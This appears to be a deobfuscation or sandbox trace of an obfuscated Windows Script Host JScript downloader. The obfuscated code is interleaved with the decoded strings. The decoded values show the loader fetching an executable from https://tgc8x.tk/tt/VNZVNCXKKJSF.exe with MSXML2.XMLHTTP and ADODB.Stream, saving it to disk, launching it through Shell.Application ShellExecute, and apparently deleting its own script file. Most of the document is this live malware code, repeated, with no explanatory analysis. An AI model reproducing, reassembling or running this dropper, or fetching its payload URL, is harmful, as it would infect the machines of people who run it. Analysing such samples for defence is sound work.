                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute
return _0xe99d =
  function (_0xe99d3f, _0x318392) {
                                                                                                                                                                                                                                                                                                                          • _0xe99d(234,undefined) ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(260,undefined) ➔ "push"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(234,undefined) ➔ "W4ZdJrRdRue"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(260,undefined) ➔ "76392yWuOtG"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(233,undefined) ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(234,undefined) ➔ "421620Dulpsf"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(260,undefined) ➔ "W73dVr7dRxtcHSkIW4xcK27cLSoWWOa"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(233,undefined) ➔ "W4ZdJrRdRue"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(234,undefined) ➔ "282elZIVv"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(260,undefined) ➔ "5991OPUtAM"
    _0xe99d3f = _0xe99d3f - 0xc8;
    var _0x59ecb7 = _0x3974d[_0xe99d3f];
    return _0x59ecb7;
  }, _0xe99d ( _0x304024, _0x5125dd );
}
function _0x4a61() {
                                                                                                                                                                                                                                                                                                                                    • _0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD
                                                                                                                                                                                                                                                                                                                                    var _0x295f59 = _0x5099, _0x126005 = _0x56566c, _0x377202 = [ _0x126005 ( 0xef ), 'Open', _0x126005 ( 0xe7 ), 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW', _0x126005 ( 0xda ), _0x126005 ( 0x10c ), _0x126005 ( 0xf7 ), _0x126005 ( 0xf3 ), _0x295f59 ( 0xe6, 'J(3^' ), _0x126005 ( 0xf9 ), _0x126005 ( 0xd8 ), _0x126005 ( 0xe5 ), _0x126005 ( 0xcb ), 'vcFcV8kjWRZdHmk4WROea0xcUa', _0x126005 ( 0xf2 ), _0x126005 ( 0xec ), _0x126005 ( 0xfd ), '995898DfgeKn', _0x295f59 ( 0x109, '!Ro&' ), _0x295f59 ( 0xe0, 'e(J5' ), 'Type', _0x295f59 ( 0xfe, 'h2t$' ), _0x126005 ( 0x102 ), _0x295f59 ( 0x10b, 'pUd0' ), _0x126005 ( 0xee ), 'xSkvWPCOWOniFvTXeCkMbCkL', _0x295f59 ( 0xf0, 'Uvs9' ), _0x295f59 ( 0xca, 'cLA8' ), _0x126005 ( 0x107 ), 'W4NdNCkFW6WLcfzu', 'Shell.Application', _0x295f59 ( 0xd3, '4J2k' ), _0x295f59 ( 0xc9, 'IG#1' ), _0x126005 ( 0x103 ), _0x295f59 ( 0xde, 'Umy3' ), _0x126005 ( 0xd1 ) ];
                                                                                                                                                                                                                                                                                                                                    • _0x126005(239) ➔ "Send"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(231) ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(218) ➔ "428748eDivLq"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(268) ➔ "uqtdR8kPceWHW5tdNW"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(247) ➔ "AJ3cTmowW6WowIz1WO5WW4O"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(243) ➔ "W4yuy1BdPSoFWOOIgCo6qge"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(230,"J(3^") ➔ "SaveToFile"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(249) ➔ "WQ3cNSkvBW"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(216) ➔ "W4BcISoRW5qtgXxcIx3cPCog"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(229) ➔ "W5pdICkQkCk1WQ53WQZdRCo6tSoA"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(203) ➔ "279BGVghm"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(242) ➔ "WOZcHCkvkCo+WOXZnuxcKKbM"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(236) ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(253) ➔ "https://tgc8x.tk/tt/VNZVNCXKKJSF.exe"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(265,"!Ro&") ➔ "5QEmMYO"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(224,"e(J5") ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(254,"h2t$") ➔ "W7pdMCoine3dQ8oDW6rTaczvl1e"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(258) ➔ "76392yWuOtG"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(267,"pUd0") ➔ "WRRcG8o6"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(238) ➔ "1268392teACcP"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(240,"Uvs9") ➔ "\VNZVNCXKKJSF.exe"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(202,"cLA8") ➔ "CreateObject"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(263) ➔ "Position"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(211,"4J2k") ➔ "463900CaNtRp"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(201,"IG#1") ➔ "W4BcLCo0oJRcS8kdW4SaWO1/WQaN"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(259) ➔ "W73dVr7dRxtcHSkIW4xcK27cLSoWWOa"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(222,"Umy3") ➔ "W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(209) ➔ "W4SFgdRcImkKWOiD"
return _0x4a61 =
  function () {
                                                                                                                                                                                                                                                                                                                                      • _0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD
                                                                                                                                                                                                                                                                                                                                      • _0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD
                                                                                                                                                                                                                                                                                                                                      • _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send
                                                                                                                                                                                                                                                                                                                                      • _0x4a61() ➔ DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open
                                                                                                                                                                                                                                                                                                                                      return _0x377202;
                                                                                                                                                                                                                                                                                                                                        }, _0x4a61 ( );
                                                                                                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                                                                                                            var Stream = WScript[_0x115fc7 ( 0x8f ) ] ( _0x155c25 ( 0x7f, _0x56566c ( 0xed ) ) );
                                                                                                                                                                                                                                                                                                                                            • _0x115fc7(143) ➔ "CreateObject"
                                                                                                                                                                                                                                                                                                                                            • _0x56566c(237) ➔ "BQ9o"
                                                                                                                                                                                                                                                                                                                                            • _0x155c25(127,"BQ9o") ➔ "ADODB.Stream"
                                                                                                                                                                                                                                                                                                                                            • Windows Script Host.CreateObject("ADODB.Stream") ➔
                                                                                                                                                                                                                                                                                                                                            function _0x3974() {
                                                                                                                                                                                                                                                                                                                                            • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                                                                                                                                                                                                                                                            var _0x42fe7d = [ 'dXnloCodW7pcV8k0', 'uqtdR8kPceWHW5tdNW', 'ShellExecute', 'toString', 'hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof', 'WOqoW6PSsSoAc0BdH0GfCq', '279BGVghm', 'WQLhE3xcLSkBWQ5naCorW6xdUq', 'bYVcLCkh', 'uSkzW6xdIW', 'ECoyWQGeWQzGhSkBtMlcPW', 'RzXUsr', 'W4SFgdRcImkKWOiD', 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=', 'w1vrmSoRW7VdJCkJWOVdGaldVq', 'WQtdNh4FpYK', 'AJirxSkZWOCCya9JWPhdJG', 'shift', 'WPBcTCoPW5misfRdSN7dL8oPbq', 'W4BcISoRW5qtgXxcIx3cPCog', 'EMpdGSkmdSoXsCk+W6u', '428748eDivLq', 'q2iIW7/cNf9lcq/cV8k6WOb2', 'fromCharCode', 'vUkl', 'ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO', 'length', 'WOVdSmovWONdJZGXzKNdMfxcOmo2rq', 'Bhsp', '4(*W', 'qCVKfY', 'WRNdUKyZlrG', 'W5pdICkQkCk1WQ53WQZdRCo6tSoA', 'W6LlWOT6F3X+W7JdK8od', 'DeleteFile', 'W4ZdJrRdRue', '421620Dulpsf', '282elZIVv', 'W6JcQSofWRK', 'Scripting.FileSystemObject', 'BQ9o', '1268392teACcP', 'Send', 'WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt', 'AXxcQSkOWRG', 'WOZcHCkvkCo+WOXZnuxcKKbM', 'W4yuy1BdPSoFWOOIgCo6qge', 'bs19WQHMoNZdH8oAW5eX', 'W69VWRvm', '10MQXdOq', 'AJ3cTmowW6WowIz1WO5WW4O', 'WR8BoCkPbXTiCCo9cW', 'WQ3cNSkvBW', '8ApAyti', 'WQquW65/F8ol', 'W)L8', 'https://tgc8x.tk/tt/VNZVNCXKKJSF.exe', 'A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW', 'WPRdHSkOWQrddhC', 'charCodeAt', 'push', '76392yWuOtG', 'W73dVr7dRxtcHSkIW4xcK27cLSoWWOa', '5991OPUtAM', '13285611Ofkcqp', 'ScriptFullName', 'Position', 'nmkoFSotW53cKq', 'yxSPWPPSBJW', 'AJCsxmk1WOXXxYPeWPJdSmoB' ];
                                                                                                                                                                                                                                                                                                                                              _0x3974 =
                                                                                                                                                                                                                                                                                                                                                function () {
                                                                                                                                                                                                                                                                                                                                                • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
